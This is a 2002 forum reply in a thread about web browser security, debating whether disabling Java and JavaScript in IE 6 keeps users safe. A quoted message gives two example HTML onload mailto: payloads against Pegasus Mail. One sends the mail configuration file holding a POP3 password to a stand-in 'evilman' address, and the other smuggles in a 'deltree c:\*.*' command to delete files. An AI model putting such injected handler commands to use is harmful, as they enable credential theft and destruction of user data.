Re: techport80

new topic     » goto parent     » topic index » view thread      » older message » newer message

On 20 Sep 2002, at 18:22, Martin Stachon wrote:

> 
> Kat wrote:
> > > Kat wrote:
> > > >  If you have IE 6.x it may be a bit harder to disable Java, since MS has
> > > >  taken
> > > >  
> > > > away many of those settings which allow you to close the backdoors and
> > > > loopholes. Javascript is even worse. Do you want to show webpages, or do
> > > > you want people to open up their computers to any ole script kiddie? If
> > > > you require me to breach security on my computers to see your webpages,
> > > > let me assure you it's not worth it.
> > > 
> > > You are never safe on a system where web broswer runs under root
> > > privilegies. Even with all scripting disabled.
> > > 
> > > Eg. with Pegasus Mail v3.12c and IE using this HTML:
> > > 
> > >     <body onload="mailto:evilman at here.com -F
> > >     c:\pmail\mail\Kat\pmail.ini">
> > >
> > > I can possibly obtain your POP3 password. Or this :
> > > 
> > >     <body onload="mailto:evilman at here.com -F c:\test.txt | deltree
> > >     c:\*.*">
> > > 
> > > may delete some files. 
> > 
> > Too bad i intentionally didn't download all the Pegasus display/scripting
> > files, and Pegasus has no clue where the IE display engine is, eh? blink
> 
> It has nothing to do with the display engine, just the way MSIE passes
> mailto: to Pegasus.

Oh, you meant a webpage click passing to email, i thought you meant 
recieving html email into Pegasus. Still, my IE doesn't know about Pegasus 
either, and i won't use Outlook Express. I copy/paste the address.

Kat

new topic     » goto parent     » topic index » view thread      » older message » newer message

Search



Quick Links

User menu

Not signed in.

Misc Menu